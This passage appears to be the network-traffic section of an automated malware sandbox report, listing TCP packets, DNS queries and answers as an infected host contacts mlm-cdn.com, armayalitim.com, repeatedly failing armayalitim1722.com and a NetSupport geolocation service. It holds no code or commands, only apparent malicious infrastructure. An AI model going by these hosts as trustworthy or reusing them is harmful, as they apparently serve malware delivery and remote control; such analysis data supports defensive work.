                                                      Sep 21, 2024 14:45:36.393894911 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.393942118 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.394664049 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.394726038 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.394941092 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.395020008 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.395587921 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.395646095 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.395849943 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.395901918 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.481481075 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.481559038 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.481957912 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.481997013 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.482023001 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.482034922 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.482069969 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.482084990 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.482597113 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.482650995 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.482724905 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.482765913 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.482773066 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.482791901 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.482815981 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.482846975 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.483103991 CEST49701443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.483119011 CEST44349701142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.552700043 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.552748919 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:36.552819967 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.553067923 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:36.553080082 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.081043959 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.081173897 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.081665993 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.081681967 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.081876040 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.081882000 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.285911083 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.285943985 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.286000013 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.286029100 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.286052942 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.286106110 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.374316931 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.374484062 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.375128984 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.375334978 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.376166105 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.376247883 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.417814970 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.418040991 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.462769032 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.462872028 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.463258982 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.463336945 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.464157104 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.464230061 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.464839935 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.464919090 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.465748072 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.465821028 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.465847969 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.465893984 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.465909958 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.465945959 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.465953112 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.465985060 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.466686010 CEST49702443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.466705084 CEST44349702142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.801506996 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.801554918 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:37.801613092 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.801994085 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:37.802006960 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.331573963 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.331631899 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.333144903 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.333152056 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.333319902 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.333327055 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.537333012 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.537395954 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.537399054 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.537425995 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.537453890 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.537483931 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.537497044 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.537530899 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.625634909 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.625747919 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.625992060 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.626050949 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.626863956 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.626931906 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.627840996 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.627907991 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.714333057 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.714411020 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.714886904 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.714942932 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.715648890 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.715837955 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.716509104 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.716571093 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.717367887 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.717433929 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.717664957 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.717720032 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.718859911 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.718920946 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.802797079 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.802881002 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.803077936 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.803138018 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.803497076 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.803555012 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.803849936 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.803905010 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.804116011 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.804167032 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.804589033 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.804629087 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.804694891 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.804694891 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.804708958 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.804752111 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.807666063 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.807749987 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.807936907 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.807985067 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.808355093 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.808408976 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.808552027 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.808610916 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.891824961 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.891952991 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.891979933 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.892009974 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.892045021 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.892061949 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.892112017 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.892175913 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.892250061 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.892323971 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.892632008 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.892699003 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.893196106 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.893286943 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.893294096 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.893317938 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.893353939 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.893378973 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.894062042 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.894133091 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.894155979 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.894212008 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.894912004 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.894990921 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.895023108 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.895087957 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.895112038 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.895172119 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.895781040 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.895854950 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.895889044 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.895970106 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.896662951 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.896742105 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.896761894 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.896814108 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.980186939 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.980328083 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.980431080 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.980480909 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.980674028 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.980731010 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.981184006 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.981241941 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.981622934 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.981678963 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.981857061 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.981905937 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.982398033 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.982470989 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.982873917 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.982932091 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.982932091 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.982944012 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.982969999 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.982980013 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.982994080 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.983016968 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.983035088 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.983813047 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.983863115 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.983871937 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.983877897 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.983920097 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.984685898 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.984740019 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.984741926 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.984750986 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.984774113 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.984787941 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.984795094 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.984858990 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:38.985582113 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:38.985647917 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.068650961 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:39.068783045 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.069000959 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:39.069149971 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.069299936 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:39.069356918 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.069370985 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:39.069405079 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:39.069407940 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.069451094 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.076342106 CEST49703443192.168.2.7142.11.212.184
                                                      Sep 21, 2024 14:45:39.076363087 CEST44349703142.11.212.184192.168.2.7
                                                      Sep 21, 2024 14:45:39.519445896 CEST49704443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:45:39.519488096 CEST4434970437.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:45:39.519711971 CEST49704443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:45:39.583432913 CEST49704443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:45:39.583453894 CEST4434970437.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:45:39.583517075 CEST4434970437.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:45:40.590425014 CEST4970580192.168.2.7172.67.68.212
                                                      Sep 21, 2024 14:45:40.595690966 CEST8049705172.67.68.212192.168.2.7
                                                      Sep 21, 2024 14:45:40.595936060 CEST4970580192.168.2.7172.67.68.212
                                                      Sep 21, 2024 14:45:40.596533060 CEST4970580192.168.2.7172.67.68.212
                                                      Sep 21, 2024 14:45:40.601782084 CEST8049705172.67.68.212192.168.2.7
                                                      Sep 21, 2024 14:45:41.241857052 CEST8049705172.67.68.212192.168.2.7
                                                      Sep 21, 2024 14:45:41.241981983 CEST4970580192.168.2.7172.67.68.212
                                                      Sep 21, 2024 14:46:34.895026922 CEST63016443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:46:34.895076036 CEST4436301637.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:46:34.895260096 CEST63016443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:46:34.955997944 CEST63016443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:46:34.956073046 CEST4436301637.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:46:34.956187010 CEST4436301637.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:47:08.219805956 CEST63017443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:47:08.219851017 CEST4436301737.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:47:08.219908953 CEST63017443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:47:08.284018040 CEST63017443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:47:08.284050941 CEST4436301737.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:47:08.284104109 CEST4436301737.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:47:30.568032980 CEST4970580192.168.2.7172.67.68.212
                                                      Sep 21, 2024 14:47:30.573524952 CEST8049705172.67.68.212192.168.2.7
                                                      Sep 21, 2024 14:47:30.575905085 CEST4970580192.168.2.7172.67.68.212
                                                      Sep 21, 2024 14:47:42.513309956 CEST63018443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:47:42.513359070 CEST4436301837.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:47:42.513807058 CEST63018443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:47:42.637018919 CEST63018443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:47:42.637053967 CEST4436301837.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:47:42.637120008 CEST4436301837.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:48:15.488215923 CEST63019443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:48:15.488272905 CEST4436301937.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:48:15.488357067 CEST63019443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:48:15.550273895 CEST63019443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:48:15.550304890 CEST4436301937.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:48:15.550365925 CEST4436301937.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:48:48.707824945 CEST63020443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:48:48.707878113 CEST4436302037.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:48:48.711967945 CEST63020443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:48:48.769455910 CEST63020443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:48:48.769473076 CEST4436302037.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:48:48.769550085 CEST4436302037.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:49:21.895914078 CEST63021443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:49:21.895967007 CEST4436302137.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:49:21.900033951 CEST63021443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:49:21.959918976 CEST63021443192.168.2.737.1.209.225
                                                      Sep 21, 2024 14:49:21.959949970 CEST4436302137.1.209.225192.168.2.7
                                                      Sep 21, 2024 14:49:21.960012913 CEST4436302137.1.209.225192.168.2.7

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 21, 2024 14:45:29.931708097 CEST6480653192.168.2.71.1.1.1
                                                      Sep 21, 2024 14:45:30.191175938 CEST53648061.1.1.1192.168.2.7
                                                      Sep 21, 2024 14:45:39.463484049 CEST5585653192.168.2.71.1.1.1
                                                      Sep 21, 2024 14:45:39.507834911 CEST53558561.1.1.1192.168.2.7
                                                      Sep 21, 2024 14:45:39.613857031 CEST5639853192.168.2.71.1.1.1
                                                      Sep 21, 2024 14:45:39.623414040 CEST53563981.1.1.1192.168.2.7
                                                      Sep 21, 2024 14:45:40.577469110 CEST5259853192.168.2.71.1.1.1
                                                      Sep 21, 2024 14:45:40.587286949 CEST53525981.1.1.1192.168.2.7
                                                      Sep 21, 2024 14:45:51.400764942 CEST53621071.1.1.1192.168.2.7
                                                      Sep 21, 2024 14:46:34.957557917 CEST5010253192.168.2.71.1.1.1
                                                      Sep 21, 2024 14:46:34.967550993 CEST53501021.1.1.1192.168.2.7
                                                      Sep 21, 2024 14:47:08.285001993 CEST5092353192.168.2.71.1.1.1
                                                      Sep 21, 2024 14:47:08.387445927 CEST53509231.1.1.1192.168.2.7
                                                      Sep 21, 2024 14:47:42.640400887 CEST5330953192.168.2.71.1.1.1
                                                      Sep 21, 2024 14:47:42.649945974 CEST53533091.1.1.1192.168.2.7
                                                      Sep 21, 2024 14:48:15.550982952 CEST5019253192.168.2.71.1.1.1
                                                      Sep 21, 2024 14:48:15.766632080 CEST53501921.1.1.1192.168.2.7
                                                      Sep 21, 2024 14:48:48.770603895 CEST5042953192.168.2.71.1.1.1
                                                      Sep 21, 2024 14:48:48.777656078 CEST53504291.1.1.1192.168.2.7
                                                      Sep 21, 2024 14:49:21.968064070 CEST5151853192.168.2.71.1.1.1
                                                      Sep 21, 2024 14:49:22.094172001 CEST53515181.1.1.1192.168.2.7

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Sep 21, 2024 14:45:29.931708097 CEST192.168.2.71.1.1.10xd24eStandard query (0)mlm-cdn.comA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:45:39.463484049 CEST192.168.2.71.1.1.10x8f8fStandard query (0)armayalitim.comA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:45:39.613857031 CEST192.168.2.71.1.1.10x107Standard query (0)armayalitim1722.comA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:45:40.577469110 CEST192.168.2.71.1.1.10x5f83Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:46:34.957557917 CEST192.168.2.71.1.1.10x3bacStandard query (0)armayalitim1722.comA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:47:08.285001993 CEST192.168.2.71.1.1.10x756aStandard query (0)armayalitim1722.comA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:47:42.640400887 CEST192.168.2.71.1.1.10x3611Standard query (0)armayalitim1722.comA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:48:15.550982952 CEST192.168.2.71.1.1.10xd959Standard query (0)armayalitim1722.comA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:48:48.770603895 CEST192.168.2.71.1.1.10x6edcStandard query (0)armayalitim1722.comA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:49:21.968064070 CEST192.168.2.71.1.1.10x86b7Standard query (0)armayalitim1722.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Sep 21, 2024 14:45:30.191175938 CEST1.1.1.1192.168.2.70xd24eNo error (0)mlm-cdn.com142.11.212.184A (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:45:39.507834911 CEST1.1.1.1192.168.2.70x8f8fNo error (0)armayalitim.com37.1.209.225A (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:45:39.623414040 CEST1.1.1.1192.168.2.70x107Name error (3)armayalitim1722.comnonenoneA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:45:40.587286949 CEST1.1.1.1192.168.2.70x5f83No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:45:40.587286949 CEST1.1.1.1192.168.2.70x5f83No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:45:40.587286949 CEST1.1.1.1192.168.2.70x5f83No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:46:34.967550993 CEST1.1.1.1192.168.2.70x3bacName error (3)armayalitim1722.comnonenoneA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:47:08.387445927 CEST1.1.1.1192.168.2.70x756aName error (3)armayalitim1722.comnonenoneA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:47:42.649945974 CEST1.1.1.1192.168.2.70x3611Name error (3)armayalitim1722.comnonenoneA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:48:15.766632080 CEST1.1.1.1192.168.2.70xd959Name error (3)armayalitim1722.comnonenoneA (IP address)IN (0x0001)false
